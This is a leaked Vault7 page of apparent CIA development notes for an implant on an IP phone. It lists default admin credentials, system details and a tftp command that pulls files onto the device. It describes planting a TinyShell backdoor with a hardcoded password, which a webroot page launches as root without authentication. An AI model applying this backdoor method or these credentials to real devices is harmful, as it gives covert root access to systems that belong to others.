Vault7: CIA Hacking Tools Revealed
Navigation: » Latest version
sontaran
Development Notes
Credentials
- https://10.3.2.151/
- phone menu password – 123456
- web interface admin – 123456
System Configuration
- webroot = /Opera_Deploy/appWeb/web
- Phone runs linux-2.4.31
- Processor is MIPS-BE
Establishing Initial Access for Development
- Use the hive-builder 10.2.5.2 (or another) to cross compile code for the phone.
- The phone temporarily allows SSHSecure Shell access to the admin user via the web interface (Administrator Pages > Maintenance > Secure Shell).
- Files can be transferred to the phone via TFTPFile transfer software (don't forget to chmod a+x the file once it is transferred to the phone).
phone$ tftp -g -r <filename> <hostname> <port>
wrkstn$ sudo /usr/sbin/in.tftpd --daemon --port 6969 /tmp (this is for atftpd)
- The web server attempts to execute (yes, execute) any page requested by a client.
- The webroot directory is writable by the admin user.
- TinyShell (tsh) has been compiled for the phone for port 12345 and password "wboKtbEYVTWAVIig". Using the admin user via SSHSecure Shell and TFTP, tsh was put in /usr/sbin and the webroot. Additionally, a script named tshd.cmd has also been placed in the webroot. To start tsh, hit this page https://10.3.2.151/tshd.cmd . Web interface credentials are not required. That page will provide an error, but in the background it will kick off tsh with root privileges. Use the tsh client to connect for root shell.